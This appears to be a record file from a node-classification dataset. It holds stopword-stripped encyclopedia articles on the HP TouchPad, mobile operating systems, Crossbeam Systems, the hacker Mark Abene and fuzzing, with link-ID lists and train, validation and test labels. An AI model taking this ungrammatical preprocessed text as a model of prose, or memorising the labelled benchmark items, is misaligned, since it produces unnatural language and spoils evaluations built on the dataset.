promotion following successful sale clear component suppliers inventories touch panels batteries chassis hp announced august 30 would make another production run touchpad units used fulfill existing orders businesses like tiger direct best buy bundles set price 249.99 299.99 following meg whitman appointment ceo hp conjunction announcement company plans continue developing webos open-source operating system said company would continue using os devices specifically resuming use tablets said would happen 2012 would probably take place 2013 february 2013 hp sold source code transferred remaining webos team lg effectively ending webos deployment tablets consumer products hp touchpad touchscreen tablet runs hp webos several notable features touchpad uses card multitasking found palm pre phones integrated webcam front hp touchpad enables video conferencing backlit home button bottom hp touchpad also allows haptic feedback vibration function hardware includes arm-based qualcomm snapdragon processor 1gb ram touch share allows pre 3 mobile share information websites touching sensors touchpad sensors touchpad receive calls text messages forwarded phone using palm profile well make receive calls via skype application independent site estimated 16gb 32gb hp touchpad contained 296.15 318.15 materials respectively cost assemble 10 hp touchpad 9.7 inch 1024×768 pixel gorilla glass multitouch capacitive touch screen interaction finger capacitive stylus available separate purchase touchpad virtual keyboard configured one four preset sizes number row top common qwerty layout touchpad also features invensense 3-axis gyroscope touchpad three separate physical buttons sleep/wake button top right home button bottom front launches card view app launcher set volume rockers right device holding power button home button together creates screen snapshot touchpad stereo speakers feature beats audio atheros ar6003 chipset supports dual band 2.4 ghz 5 ghz wi-fi 802.11a/b/g/n bluetooth 2.1 edr a2dp stereo bluetooth tablet share urls phone calls text messages webos phones via bluetooth pairing pairing non-webos smartphones enabled software update 3.0.4 touchpad uses rechargeable 6000 6300 mah lithium-ion polymer battery rated 3,7 v total 22,2 wh charged via microusb connector optional wireless charging touchstone charger using touchstone touchpad enters mode called exhibition mode displays simple information clock schedule media battery life estimated nine hours hp review engadget battery lasted eight half hours july 2011 hp announced webos hardware roadmap included hp touchpad 4g faster 1.5 ghz processor 32 gb flash memory integrated a-gps 3.5g hspa+ wireless mobile broadband capabilities demo models displayed press show released sale except hp employees later appeared ebay craigslist august white model 64 gb flash memory 1.5 ghz processor wi-fi – without 3.5g – built small quantities shipped small number touchpad go models codenamed opal 7-inch display 32 gb flash memory 1.5-ghz processor cellular capabilities made sent technology review websites smaller touchpads however mass-produced overall inspiration later carried hp slate 7 touchpad sold webos operating system offers video chat wireless printing hp printers email integration ebooks web browsing document editing access hp catalog additional apps downloaded webos card-based multitasking environment open applications arranged stacks webos unobtrusively notifies users messages emails calendar agenda items appearing top right screen rapidly reviewed swipe gesture webos 3.0 integrates adobe flash last updated version 3.0.5 january 12 2012 hp supports funding new open source project webos scalability easy app development base attracts developers open source webos provides standardized java development tools build port apps webos rapidly open webos released hp directly work touchpad due proprietary code hp however released open source webos community edition use touchpad october 6 2011 reported customers received new touchpads android installed instead webos hp investigating unofficial release commented october 22 2011 android 2.3 gingerbread alpha version became available touchpad port based cyanogenmod enhanced distribution android allows touchpad run android apps natively android port touchpad replace webos provides multi-boot touchpad owners start tablets android webos oss android 3.0 'honeycomb ported touchpad source code publicly available january 17 2012 port android 4.0 ice cream sandwich based cyanogenmod 9 became available preliminary alpha build alpha 0 features including hardware-accelerated video playback microphone camera functional time updated alpha 0.5 around january 24 2012 alpha 0.6 around january 30 2012 bringing fixes stability improvements february 2 2012 hp released source code android 2.3 hp touchpad cyanogenmod team received source code hp started working touchpad tablet port phonenews.com reported android kernel based qualcomm ’ reference android source code used hp internally accelerate release touchpad never intended public use rather ensure touchpad ’ hardware would ready release consumers alongside webos 3 webos 3 lagging behind hardware development android also used manufacturing lines test touchpads ultimately flashed webos cyanogenmod 9 cm9 based android 4.0.4 official stable builds features working also unofficial cm10 cm10.1 cm10.2 cm11 based builds features working cm11 builds stability daily use dependent kernel used development kernels based linux 3.0 3.4 proceeding rom based 3.4 kernel unstable may features missing rom based 3.0 kernel generally stable android 5.0 works touchpad although sluggish android 7.0 nougat made available september 2016 via evervolv android open source project aosp rom authored flintman nearly feature complete usable runs better 5.1 android 7.1.1 nougat made available around december 2016 via evervolv authored flintman well second option lineageos authored invisiblek android 9.0 pie made available april 2019 via evervolv android open source project aosp rom linux distributions compiled arm architecture successfully run via chroot also x11 windowing system common many linux systems ported run within webos allows graphical applications made linux run webos port ubuntu run natively touchpad development january 2012 boots via moboot multiboot bootloader using method android port port early alpha stage functional development ended 2012 addition ubuntu alpha port arch linux arm january 2012 provides full touchscreen support gnome 3 lxde wi-fi access bluetooth camera sound installed using previously mentioned moboot method luneos linux-based operating system designed specifically native execution touch devices touchstone wireless charging dock charging touchstone touchpad set exhibition mode allowing user choose display photos digital photo frame upcoming appointments clock items using third party extensions touchstone also enables wireless communication hp pre3 touchpad tapping specific region transfer web links pre technology known “ touch share ” touchstone usb power cable attached usb standard-a plug end must plugged high-power usb power adapter hp touchpad power adapter newer high-current usb adapter hp shows warning user manual plug laptop north america touchstone ships ac power adapter included touchpad bluetooth wireless keyboard typical qwerty layout plus additional keys special touchpad capabilities power slide switch bottom two aa batteries required special touchpad keys power card view cursor left/up/right/down volume +/- mute brightness +/- fast forward play-pause rewind show virtual keyboard show type show notifications keyboard pair bluetooth devices key functions may missing keyboard layout outside alpha numeric keys specific touchpad power adapter converts wall ac usb dc accessory contains following items touchpad adapter cable touchstone adapter-only ships accessory protective case doubles stand watching videos typing holes edges case access microusb connector 3.5 mm jack connector internal microphone folded open opening speaker along binding edge case raised surface power volume buttons easily found touchpad charge case using either microusb cable touchstone dock early reviews hp touchpad mixed david pogue new york times wrote works beautifully conveys far information ipad 2 tablet offers real multitasking open apps always running jason chen gizmodo wrote actually holding touchpad say deceptively heavy around weight ipad 'd think would lighter back made plastic said overly heavy heavier 'd think looking matt buchanan also writing gizmodo praised os interface concept 'good conceptually described performance slow motion ... give thing six months could amazing well guess says everything needs said verge also noted poor performance describing interface 'intuitive natural 'sluggish unfinished ... bit hard sell right due firesale touchpad hp led non-apple tablets sold us 2011 december 2011 hp touchpad second desired tablet 5 percent share tablet sales estimated 903,354 devices sold hp touchpad firesale effect future android tablet sales low pricing scheme compared ipad used kindle fire nexus 7 commercially successful android tablets originally priced 199
[ 2945, 2308, 10500, 6790, 9863, 5384, 6539, 3340, 3214, 2962, 8212, 3606, 8982, 1304, 9244, 6178, 8229, 424, 5164, 303, 7983, 8627, 9013, 694, 9913, 1083, 5571, 5318, 11337, 5963, 7243, 9037, 9163, 3281, 1874, 2259, 3409, 1621, 10838, 7548...
Train
2,259
2
Mobile_operating_system:mobile operating system mobile operating system mobile os operating system phones tablets smartwatches mobile devices computers typical laptops 'mobile operating systems usually used considered mobile ones originally designed desktop computers historically need specific mobile features distinction becoming blurred newer operating systems hybrids made uses mobile operating systems combine features personal computer operating system features useful mobile handheld use usually including following considered essential modern mobile systems wireless inbuilt modem sim tray telephony data connection touchscreen cellular bluetooth wi-fi protected access wi-fi global positioning system gps mobile navigation video- single-frame picture cameras speech recognition voice recorder music player near field communication infrared blaster q1 2018 383 million smartphones sold 86.2 percent running android 12.9 percent running ios android alone popular popular desktop operating system windows general smartphone use even without tablets outnumber desktop use mobile devices mobile communications abilities e.g. smartphones contain two mobile operating systemsthe main user-facing software platform supplemented second low-level proprietary real-time operating system operates radio hardware research shown low-level systems may contain range security vulnerabilities permitting malicious base stations gain high levels control mobile device mobile operating systems majority use since 2017 measured web use even smartphones running excluding tablets used kind device thus traditional desktop os minority used kind os see usage share operating systems however variations occur popularity regions desktop-minority also applies days regions united states united kingdom mobile operating system milestones mirror development mobile phones smartphones operating systems often run atop baseband real time operating systems handle hardware aspects phone android based modified linux kernel mobile operating system developed google inc besides largest installed base worldwide smartphones also popular operating system general purpose computers category includes desktop computers mobile devices even though android popular operating system regular desktop personal computers pcs although android operating system free open-source software devices sold much software bundled including google apps vendor-installed software proprietary software closed source android releases 2.0 1.0 1.5 1.6 used exclusively mobile phones android 2.x releases mostly used mobile phones also tablets android 3.0 tablet-oriented release officially run mobile phones phone tablet compatibility merged android 4.0 current android version 9.0 pie android releases named sweets dessert items except first second releases android one software experience runs unmodified android operating system closely resembles running pixel devices previously google nexus program unlike stock androids running market android one ui closely resembles pixel ui due android one software experience developed google distributed partners signup program nokia xiaomi thus overall ui intended clean possible oem partners may tweak add additional apps cameras firmware otherwise apps handled google proprietary apps update handled google internally tested oem distributed via ota update end users designed alibaba based android amazfit os mobile operating system based android develop xiaomi backed huami higher-end amazfit series smartwatch amazfit pace verge stratos due android based operating system therefore side loaded android apk file run smartwatch similar miui although amazfit os based open source aosp consists closed source proprietary software blackberry secure operating system developed blackberry based android open source project aosp officially announced name android based front-end touch interface august 2017 announcement blackberry secure running blackberry brand devices blackberry priv dtek 50/60 blackberry keyone currently blackberry plan license blackberry secure oem coloros custom front-end touch interface based android open source project aosp developed oppo electronics corp. oppo officially releases coloros every oppo device released official rom oneplus one emotion user interface emui front-end touch interface developed huawei technologies co. ltd. based google android open source project aosp emui preinstalled huawei honor devices based open source android operating system consists closed source proprietary software /e/ operating system forked source code lineageos based android supports currently 76 devices april 2019 /e/ targets android smart phone devices uses microg replacement google play services flyme os operating system developed meizu technology co. ltd. open source os based google android open source project aosp flyme os mainly installed meizu smartphones mx series however also official rom support android devices funtouch os fork android developed vivo funtouch os difference traditional android ui funtouch os includes features unavailable former customizable gestures communication drawer bottom top swipe security centre lock screen resize options long screen shot eye protection changing warmer color temperature others funtouch os respects looks similar ios made apple grapheneos formerly named android hardening variant android runs pixel 2 pixel 3 hardware mainly developed daniel micay aims focus security privacy htc sense software suite developed htc used primarily company android-based devices serving successor htc touchflo 3d software windows mobile sense modifies many aspects android user experience incorporating added features altered home screen keyboard widgets htc-developed applications redesigned applications first device sense htc hero released 2009 indus os custom mobile operating system based android open source project aosp developed indus os team based india longer valid 2018indus os available micromax intex karbonn indian smartphone brands lg ux formerly named optimus ui front-end touch interface developed lg electronics partners featuring full touch user interface sometimes incorrectly identified operating system lg ux used internally lg sophisticated feature phones tablet computers available licensing external parties optimus ui 2 based android 4.1.2 released optimus k ii optimus neo 3 features refined user interface compared prior version based android 4.1.1 would include together new functionality voice shutter quick memo lineage android distribution custom mobile operating system based android open source project aosp serves successor highly popular custom rom cyanogenmod forked december 2016 cyanogen inc. announced discontinuing development shut infrastructure behind project since cyanogen inc. retained rights cyanogen name project rebranded fork lineageos similar cyanogenmod include proprietary apps unless user installs allows android users longer obtain update support manufacturer continue updating os version latest one based official release google aosp heavy theme customization mifavor custom android ui developed zte smartphone running android platform similar android ui mifavor replace stock apps zte owns apps however ux still closely similar stock android mi user interface miui developed chinese electronic company xiaomi inc. mobile operating system based android open source project aosp miui mostly found xiaomi smartphones mi redmi series however also official rom support android devices although miui based aosp open source consists closed source proprietary software miui poco custom mobile operating system based miui based android open source project aosp like predecessor also develop xiaomi inc unlike original miui miui poco specifically customized poco series smartphone including difference ui frequent update compare original miui like miui based open source aosp miui poco also consists closed source proprietary software oxygenos based open source android open source project aosp developed oneplus replace cyanogen os oneplus devices oneplus one preinstalled oneplus 2 oneplus x oneplus 3 oneplus 3t oneplus 5 oneplus 5t oneplus 6 stated oneplus oxygenos focused stabilizing maintaining stock like found nexus devices consists mainly google apps minor ui customization maintain sleekness pure android pixel ui developed google based open source android unlike nexus phones google shipped stock android ui came first generation pixel phones slightly modified compared stock android part google pixel software pixel ui home launcher closed source proprietary thus available pixel family devices however third party mods allow non pixel smartphones install pixel launcher google feed integration replicant custom mobile operating system based android proprietary drivers bloat closed source software removed samsung experience formerly called touchwiz front-end touch interface developed samsung electronics partners featuring full touch user interface sometimes incorrectly identified independent operating system samsung experience used internally samsung smartphones feature phones tablet computers available licensing external parties closed source proprietary android version samsung experience also comes samsung-made apps preloaded except starting galaxy s6 removed samsung pre-loaded apps installed leaving one galaxy apps save storage space initially due removal microsd release samsung galaxy s8 s8+ samsung experience 8.1 preinstall introducing new function known samsung dex similar concept microsoft continuum samsung dex allowed high end galaxy devices s8/s8+ note 8 connect docking station extends functionality allow desktop-like functionality connecting keyboard mouse monitor samsung also announced linux galaxy allows use standard linux distribution dex platform sony xperia ui formerly known timescape ui front-end ui developed sony mobile formerly sony ericsson sony xperia series running android platform sony xperia ui mostly consists sony application sony music formerly known walkman music player albums video player time timescape ui ui different standard android ui instead traditional apps dock bottom part located four corner home screen middle screen consist widget however recent development ui closely resemble stock android zenui front-end touch interface developed asus partners featuring full touch user interface zenui used asus android phones tablet computers available licensing external parties zenui also comes preloaded asus-made apps like zenlink pc link share link party link remote link non-android operating systems listed following sections chrome os operating system designed google based linux kernel uses google chrome web browser principal user interface result chrome os primarily supports web applications google announced project july 2009 conceiving operating system applications user data reside cloud hence chrome os primarily runs web applications due increase popularity 2 1 pcs recent chromebooks introduced touch screen capability android applications starting become available operating system 2014 2016 access android apps entire google play store introduced supported chrome os devices support android applications chromebook devices positioned tablet based instead notebooks chrome os available pre-installed hardware google manufacturing partners open source equivalent chromium os compiled downloaded source code early google provided design goals chrome os otherwise released technical description fuchsia capability-based real-time operating system rtos currently developed google first discovered mysterious code post github august 2016 without official announcement contrast prior google-developed operating systems chrome os android based linux kernels fuchsia based new microkernel called zircon derived little kernel small operating system intended embedded systems upon inspection media outlets noted code post github suggested fuchsia capability run universal devices embedded systems smartphones tablets personal computers may 2017 fuchsia updated user interface along developer writing project experimental prompting media speculation google intentions operating system including possibility replacing android liteos lightweight open source real-time operating system part huawei 1+2+1 internet things solution similar google android things samsung tizen huawei liteos features lightweight low-power fast-response multi-sensor collaboration multi-protocol interconnect connectivity enabling iot terminals quickly access network huawei liteos make intelligent hardware development easier thereby accelerating realization interconnection things currently liteos introduce consumer market huawei watch gt series smartbands current liteos version list pureos debian gnu/linux derivative using free software developed purism already used purism laptops planned use librem 5 smartphone purism partnership gnome kde aims separate cpu baseband processor include hardware kill switches phone wi-fi bluetooth camera microphone baseband processor provide gnome kde plasma mobile options desktop environment sailfish os jolla open source gnu general public license gpl middleware stack core comes mer sailfish due jolla business model due alliances various partners due intentional design os internals capable adopt several layers third party software including jolla software e.g jolla ui proprietary software closed source components proprietary many different kinds licences however user replace open source components like e.g nemo ui instead jolla ui nokia abandoned 2011 meego project meego team left nokia established jolla company use meego mer business opportunities mer standard allows launched hardware kernel compatible mer 2012 linux sailfish os based meego using middleware mer core stack distribution launched public use first device jolla smartphone unveiled may 20 2013 2015 jolla tablet launched brics countries declared officially supported os jolla started licensing sailfish os 2.0 third parties devices sold updateable sailfish 2.0 limits sailfish os version release named finnish lake tizen based linux kernel mobile operating system hosted linux foundation together support tizen association guided technical steering group composed intel samsung tizen operating system devices including smartphones tablets in-vehicle infotainment ivi devices smart tvs open source system however sdk closed source proprietary aims offer consistent user experience across devices tizen main components linux kernel webkit runtime according intel tizen combines best limo meego html5 apps emphasized meego encouraging members transition tizen stating future belongs html5-based applications outside relatively small percentage apps firmly convinced investment needs shift toward html5 tizen targeted variety platforms handsets touch pc smart tvs in-vehicle entertainment may 17 2013 tizen released version 2.1 code-named nectarine tizen open source ux ui layer developed samsung mainly closed source proprietary touchwiz ui samsung z series smartphone current tizen version list ubuntu touch canonical ltd.. open source uses gpl license ubuntu touch os built using android linux kernel using android drivers services via lxc container use java-like code android desktop environment ubuntu touch planned available one default desktop options librem 5 running pureos operating system though canonical formally announced discontinuing ubuntu mobile os integral component unity8 independent german non-profit ubports community/ foundation paperwork pending local berlin-government decided take project canonical started ubuntu touch based ubuntu 15.04 vivid vervet ubports upgraded base nearest current long-term support version ubuntu 16.04 lts xenial xerus original canonical ubuntu touch version list ubports ubuntu touch version list plasma mobile kde desktop environment mobile phones intended compatible several different mobile phone operating systems including pureos running librem 5 open source mobile operating systems active development include luneos based webos postmarketos based alpine linux gnu/linux distribution maemo leste meizu pro 5 ubuntu edition meizu mx4 ubuntu edition running ubuntu touch necuno using gnu/linux distribution plasma mobile desktop kde proprietary version amazfit os develop xiaomi backed huami amazfit bip smartwatch however instead based android based proprietary operating system thus able install third party apps apks ios formerly named iphone os created apple inc second largest installed base worldwide smartphones largest profits due aggressive price competition android-based manufacturers closed source proprietary built open source darwin operating system iphone ipod touch ipad second third-generation apple tv use ios derived macos native third party applications officially supported release iphone os 2.0 july 11 2008 jailbreaking allowed third party applications installed recent years jailbreaking scene changed drastically due apple continued efforts secure operating system prevent unauthorized modifications currently jailbreaks recent iterations ios semi-untethered requires device re-jailbroken every boot exploits jailbreaks becoming increasingly hard find use currently ios devices developed apple manufactured foxconn another apple partners watchos operating system apple watch developed apple inc based ios operating system many similar features released april 24 2015 along apple watch device runs watchos currently widely used wearable operating system features focus convenience able place phone calls send texts health fitness heart rate tracking current version watchos operating system watchos 5 windows 10 personal computer operating system developed released microsoft part windows nt family operating systems released july 29 2015 like predecessors designed run across multiple microsoft product pcs tablets windows user interface revised handle transitions mouse-oriented interface touchscreen-optimized interface based available input devices‍—‌particularly 2-in-1 pcs windows 10 also introduces universal apps expanding metro-style apps apps designed run across multiple microsoft product families nearly identical code‍—‌including pcs tablets smartphones embedded systems xbox one surface hub mixed reality current windows 10 version list kaios kai based firefox os unlike mobile operating systems focus smartphones kaios developed mainly feature phones giving access advanced technologies usually found smartphones app stores wi-fi/4g capabilities blackberry 10 based qnx os blackberry smartphone os closed source proprietary runs phones tablets manufactured blackberry one dominant platforms world late 2000s global market share reduced significantly mid-2010s late 2016 blackberry announced continue support os promise release 10.3.3 therefore blackberry 10 would receive major updates blackberry partners would focus android base development current blackberry 10 version list windows 10 mobile formerly called windows phone microsoft closed source proprietary unveiled february 15 2010 windows phone includes user interface inspired microsoft metro design language integrated microsoft services onedrive office xbox music xbox video xbox live games bing also integrates many non-microsoft services facebook google accounts windows phone devices made primarily microsoft mobile/nokia also htc samsung january 21 2015 microsoft announced windows phone brand phased replaced windows 10 mobile bringing tighter integration unification pc counterpart windows 10 provide platform smartphones tablets screen sizes 8 inches october 2017 microsoft officially announced would longer push major updates windows 10 mobile instead would put maintenance mode microsoft would push bug fixes general improvements therefore windows 10 mobile would receive new feature updates current windows 10 mobile version list cyanogenmod custom mobile operating system based android open source project aosp custom rom co-developed cyanogenmod community os include proprietary apps unless user installed due open source nature cyanogenmod allowed android users could longer obtain update support manufacturer continue updating os version latest one based official releases google aosp heavy theme customization last version os cyanogenmod 13 based android asus december 24 2016 cyanogenmod announced blog would longer releasing cyanogenmod updates development moved lineageos cyanogen os based cyanogenmod maintained cyanogen inc however included proprietary apps available commercial uses firefox os project name boot gecko also known b2g mozilla open source mobile operating system released mozilla public license built android linux kernel used android drivers use java-like code android according ars technica mozilla says b2g motivated desire demonstrate standards-based open web potential competitive alternative existing single-vendor application development stacks offered dominant mobile operating systems september 2016 mozilla announced work firefox os ceased b2g-related code would removed mozilla-central meego non-profit organization linux foundation open source gpl 2010 mobile world congress barcelona nokia intel unveiled meego mobile operating system combined moblin maemo create open-sourced experience users across devices 2011 nokia announced would longer pursue meego favor windows phone nokia announced nokia n9 june 21 2011 nokia connection event singapore lg announced support platform maemo platform developed nokia smartphones internet tablets open source gpl based debian gnu/linux draws much graphical user interface gui frameworks libraries gnome project uses matchbox window manager gtk-based hildon gui application framework webos developed palm webos open source mobile operating system running linux kernel initially developed palm launched palm pre acquired hp two phones veer pre 3 tablet touchpad running webos introduced 2011 august 18 2011 hp announced webos hardware would discontinued would continue support update webos software develop webos ecosystem hp released webos open source name open webos plans update additional features february 25 2013 hp announced sale webos lg electronics used operating system smart internet-connected tvs however hp retained patents underlying webos cloud-based services app catalog 1999 research motion released first blackberry devices providing secure real-time push-email communications wireless devices services blackberry messenger provide integration communications single inbox september 2012 rim announced 200 millionth blackberry smartphone shipped september 2014 around 46 million active blackberry service subscribers early 2010s rim undergone platform transition changing company name blackberry limited making new devices new platform named blackberry 10 windows mobile discontinued operating system microsoft replaced windows phone closed source proprietary windows ce operating system windows mobile middleware widely spread asia mostly uses android two improved variants operating system windows mobile 6 professional touch screen devices windows mobile 6 standard unveiled february 2007 criticized user interface optimized touch input fingers instead usable stylus like ios mobile os supports touch screen physical bluetooth keyboard configurations microsoft phased windows mobile os focus windows phone windows phone family mobile operating systems developed microsoft smartphones replacement successor windows mobile zune windows phone features new user interface derived metro design language windows phone replaced windows 10 mobile 2015 symbian platform developed nokia models smartphones proprietary software however used ericsson sonyericsson sending benq operating system discontinued 2012 although slimmed-down version basic phones still developed july 2014 microsoft officially shelved platform favor windows phone acquisition nokia bada platform stylized bada korean 바다 operating system mobile devices smartphones tablet computers developed samsung electronics name derived 바다 bada meaning ocean sea korean ranges mid- high-end smartphones foster adoption bada os since 2011 samsung reportedly considered releasing source code open-source license expanding device support include smart tvs samsung announced june 2012 intentions merge bada tizen project would meanwhile use bada operating system parallel google android os microsoft windows phone smartphones bada-powered devices branded wave name samsung android-powered devices branded name galaxy february 25 2013 samsung announced stop developing bada moving development tizen instead bug reporting finally terminated april 2014 palm os/garnet os access co closed source proprietary webos introduced palm january 2009 successor palm os web 2.0 technologies open architecture multitasking abilities 2006 android ios exist 64 million smartphones sold 2018 q1 383.5 million smartphones sold global market share 85.9 android 14.1 ios according statcounter web use statistics proxy use smartphones alone without tablets majority use globally desktop computers used much less android particular popular windows use varies however continent smartphones way popular biggest continents i.e asia desktop still popular though north america desktop still popular many countries overall 44.9 first quarter 2017 smartphones popular even many developed countries countries continent desktop-minority european countries south america e.g haiti north america asia africa smartphone-majority poland turkey highest 57.68 62.33 respectively ireland smartphone use 45.55 outnumbers desktop use mobile whole gains majority including tablet share 9.12 spain also slightly desktop-minority range measured mobile web use varies lot country statcounter press release recognizes india amongst world leaders use mobile surf internet big countries share around 80 desktop 19.56 russia trailing 17.8 mobile use desktop rest smartphones alone without tablets first gained majority december 2016 desktop-majority lost month n't christmas-time fluke close majority smartphone majority happened march 2017 week november 7–13 2016 smartphones alone without tablets overtook desktop first time short period non-full-month mobile-majority applies countries paraguay south america poland europe turkey asia africa world still desktop-majority e.g united states 54.89 days however territories united states puerto rico desktop way majority windows 30 overtaken android october 22 2016 subsequent weekends mobile showed majority since october 27 desktop n't shown majority even weekdays smartphones alone showed majority since december 23 end year share topping 58.22 christmas day mobile -majority share smartphones tablets could added giving 63.22 majority unusually high top similarly high also happened monday april 17 2017 smartphones share slightly lower tablet share slightly higher combined 62.88 formerly according statcounter press release world turned desktop-minority 49 desktop use month mobile n't ranked higher tablet share added exceed desktop share note
[ 10755, 8196, 5637, 6, 9732, 11271, 3086, 7182, 529, 3089, 10770, 8213, 5143, 2072, 9244, 6685, 11294, 6178, 4132, 40, 4649, 3626, 6186, 9768, 5677, 7727, 8754, 10802, 10293, 5175, 9784, 1083, 2111, 10303, 1602, 1603, 6212, 69, 2630, 9800,...
Validation
2,260
4
Crossbeam_Systems:crossbeam systems crossbeam systems headquartered boxborough massachusetts offices europe latin america asia pacific crossbeam systems acquired blue coat systems december 2012 crossbeam brand fully absorbed blue coat crossbeam systems acquired blue coat systems december 2012 crossbeam brand fully absorbed blue coat crossbeam systems inc. incorporated november 23 1999 stephen justus mike akerman throop wilder joining founding team member 2000 since beginning crossbeam focused designing manufacturing range network security products peter george led company 2001 june 2007 ceo president pete fiore took company 2007 led company growth profitability death december 2009 march 2010 continues today ceo president november 9 2012 crossbeam systems inc. acquired private equity firm thoma bravo company publicly disclose acquisition price terms deal december 17 2012 blue coat systems announced acquiring crossbeam systems deal expected close december 31 2012 company ’ main product x-series network security product family introduced september 2001 way telecommunications operators consolidate security server appliance infrastructure one chassis acts virtual security architecture ‘ network box. ’ x-series architecture consists five major components including chassis operating system three types hardware blades modules past 11-plus years x-series product family including modules operating systems gone six major generational upgrades october 2010 5th generation upgrade x-series family network security platforms include x20 x30 x60 x80-s october 2011 crossbeam completed portfolio added 6th generation network processor module npm-9610 npm-9650 7 7 independent validation 6th generation x-series platform performance crossbeam together spirent european advanced network test centre eantc heavy reading set create new real-world methodology testing network security gprs 4g-lte mobile operator network methodology independently tested eantc crossbeam x80-s platform
[ 3520, 9764, 939, 7983, 2260, 2134 ]
Test
2,261
4
Mark_Abene:mark abene mark t. abene born february 23 1972 american infosec expert entrepreneur originally new york city better known pseudonym phiber optik member hacker groups legion doom masters deception phiber optik high-profile hacker 1980s early 1990s appearing new york times harper esquire debates television important figure 1995 non-fiction book masters deception — gang ruled cyberspace abene first contact computers around 9 years age local department store would often pass time parents shopped first computer trs-80 mc-10 4 kilobytes ram 32-column screen lower case cassette tape recorder load save programs customary time computer connected television set use monitor receiving gifts ram upgrade 20k 300 baud modem parents used computer access compuserve shortly discovered world dialup bbses via people met compuserve cb simulator first nationwide online chat bbses abene discovered dialups guest accounts dec minicomputers running rsts/e tops-10 operating systems part boces educational program long island new york accessing dec minicomputers realized programming environment much powerful home computer began taking books library order learn programming languages available ability remotely save load back programs would still next time logged profound effect abene came view rather simple computer window much larger world learned programming fundamental security concepts early years abene honed skill understanding intricacies nationwide telephone network mid-1980s first introduced members legion doom lod loosely knit group highly respected teenage hackers shared abene uncompromising desire understand technology main focus explore telecommunications systems minicomputer mainframe operating systems large-scale packet data networks eventual decline lod toward late 1980s largely due fragmentation dissention within group coupled legal prosecution handful members caused abene increasingly align local group up-and-coming hackers came known masters deception mod january 24 1990 abene mod members homes searched property seized u.s. secret service largely based government suspicions caused corporation network crash week earlier january 15 abene personally accused secret service done much search seizure weeks later admitted crash result flawed software update switching systems long distance network thus human error part february 1991 abene arrested charged computer tampering computer trespass first degree new york state offenses laws time considered “ gray area ” concerning information security abene minor time pleaded guilty first two offenses ultimately accepted plea agreement lesser misdemeanor charge sentenced 35 hours community service abene four members masters deception also arrested december 1991 indicted manhattan federal grand jury july 8 1992 11-count charge indictment relied heavily evidence collected court-approved wire tapping telephone conversations mod members according u.s. attorney otto obermaier first investigative use court-authorized wiretaps obtain conversations data transmissions computer hackers united states according july 9 1992 newsletter electronic frontier foundation defendants faced maximum term 50 years prison fines 2.5 million found guilty counts despite fact abene minor time crimes allegedly committed involved small fraction sub-charges often passive way plea arrangement resulted far harshest sentence 12 months imprisonment three years probation 600 hours community service serving one-year sentence federal prison camp schuylkill pennsylvania abene released november 1994 january 1995 huge celebration called phiberphest '95 held honor manhattan irving plaza ballroom/nightclub time joshua quittner called first underground hero information age robin hood cyberspace upon leaving jail phiber optik made cafe hang spot many people inside outside hacker world felt abene made example judged according earlier court standards abene built significant reputation hacker sub-culture example regularly appearing radio show hook hosted eric corley a.k.a emmanuel goldstein debating defending morals motivations hackers public forums interviews lecturing history telecommunications technology night courses several new york city universities time indictment working mindvox early bbs/isp founded two new york lod members subsequently echonyc multi-user bbs early isp echo users echo management hackers around nation expected abene get probation months jail time co-defendants previous offenders charged hacking offenses received rather lenient punishments given new-found enthusiasm using knowledge constructive ends general feeling optimistic prior sentencing statement made u.s. attorney otto obermeier conjunction indication message ought delivered indictment conduct tolerated irrespective age particular accused ostensible purpose interpreted abene supporters mean mod made example show authorities could handle perceived hacker threat sentencing judge stanton said defendant stands symbol today hacking crimes constitute real threat expanding information highway reinforcing view relatively harmless teacher judged symbol hackers abene spoken subject security many publications new york times washington post wall street journal time appeared speaker hacker security industry conferences worldwide frequently visits universities speak students information security years security consultant joined forces former legion doom member dave buchwald third colleague andrew brown create security consulting firm crossbar security crossbar provided consulting services third party companies principals conducted business u.s. japan brazil sweden result dot com bust crossbar ultimately went defunct 2001 largely due cuts corporate security spending abene made acting début inside man fiction film urchin completed 2006 released us february 2007 hacker notables dave buchwald emmanuel goldstein also seen 2009 founded tracevector intrusion detection firm makes use supercomputing data analytics currently resides silicon valley
[ 1121, 8321, 5512, 4331, 1804, 2383, 7983, 6837, 11576, 9433, 4956, 10110 ]
None
2,262
4
Fuzzing:fuzzing fuzzing fuzz testing automated software testing technique involves providing invalid unexpected random data inputs computer program program monitored exceptions crashes failing built-in code assertions potential memory leaks typically fuzzers used test programs take structured inputs structure specified e.g. file format protocol distinguishes valid invalid input effective fuzzer generates semi-valid inputs valid enough directly rejected parser create unexpected behaviors deeper program invalid enough expose corner cases properly dealt purpose security input crosses trust boundary often interesting example important fuzz code handles upload file user fuzz code parses configuration file accessible privileged user testing programs random inputs dates back 1950s data still stored punched cards programmers would use punched cards pulled trash card decks random numbers input computer programs execution revealed undesired behavior bug detected fixed execution random inputs also called random testing monkey testing 1981 duran ntafos formally investigated effectiveness testing program random inputs random testing widely perceived worst means testing program authors could show cost-effective alternative systematic testing techniques 1983 steve capps developed monkey tool would generate random inputs classic mac os applications macpaint figurative monkey refers infinite monkey theorem states monkey hitting keys random typewriter keyboard infinite amount time eventually type entire works shakespeare case testing monkey would write particular sequence inputs trigger crash term fuzzing originates 1988 class project taught barton miller university wisconsin fuzz test unix utility meant automatically generate random files command-line parameters utility project designed test reliability unix programs executing large number random inputs quick succession crashed also provided early debugging tools determine cause category detected failure allow researchers conduct similar experiments software source code tools test procedures raw result data made publicly available later term fuzzing limited command-line utilities 1991 crashme tool released intended test robustness unix unix-like operating systems executing random machine instructions 1995 fuzzer used test gui-based tools x window system network protocols system library apis april 2012 google announced clusterfuzz cloud-based fuzzing infrastructure security-critical components chromium web browser security researchers upload fuzzers collect bug bounties clusterfuzz finds crash uploaded fuzzer september 2014 shellshock disclosed family security bugs widely used unix bash shell vulnerabilities shellshock found using fuzzer afl many internet-facing services web server deployments use bash process certain requests allowing attacker cause vulnerable versions bash execute arbitrary commands allow attacker gain unauthorized access computer system april 2015 hanno böck showed fuzzer afl could found 2014 heartbleed vulnerability heartbleed vulnerability disclosed april 2014 serious vulnerability allows adversaries decipher otherwise encrypted communication vulnerability accidentally introduced openssl implements tls used majority servers internet shodan reported 238,000 machines still vulnerable april 2016 200,000 january 2017 august 2016 defense advanced research projects agency darpa held finals first cyber grand challenge fully automated capture-the-flag competition lasted 11 hours objective develop automatic defense systems discover exploit correct software flaws real-time fuzzing used effective offense strategy discover flaws software opponents showed tremendous potential automation vulnerability detection winner system called mayhem developed team forallsecure led david brumley september 2016 microsoft announced project springfield cloud-based fuzz testing service finding security critical bugs software december 2016 google announced 